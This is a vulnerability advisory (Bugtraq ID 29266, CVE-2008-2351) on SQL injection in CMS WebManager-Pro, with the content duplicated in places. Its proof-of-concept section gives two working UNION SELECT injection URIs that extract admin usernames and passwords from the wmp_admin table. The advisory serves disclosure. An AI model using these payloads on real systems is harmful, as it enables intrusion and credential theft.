CMS WebManager-Pro Multiple SQL Injection Vulnerabilities
BID:29266
Info
CMS WebManager-Pro Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 29266 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2351 |
| Remote: | Yes |
| Local: | No |
| Published: | May 18 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | dun |
| Vulnerable: |
CMS WebManager-Pro CMS WebManager-Pro 0 |
| Not Vulnerable: | |
Discussion
CMS WebManager-Pro Multiple SQL Injection Vulnerabilities
CMS WebManager-Pro is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS WebManager-Pro is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
CMS WebManager-Pro Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
http://www.example.com/index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
http://www.example.com/index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
Solution / Fix
CMS WebManager-Pro Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
CMS WebManager-Pro Multiple SQL Injection Vulnerabilities
References:
References:
- CMS WebManager-Pro Homepage (CMS WebManager-Pro)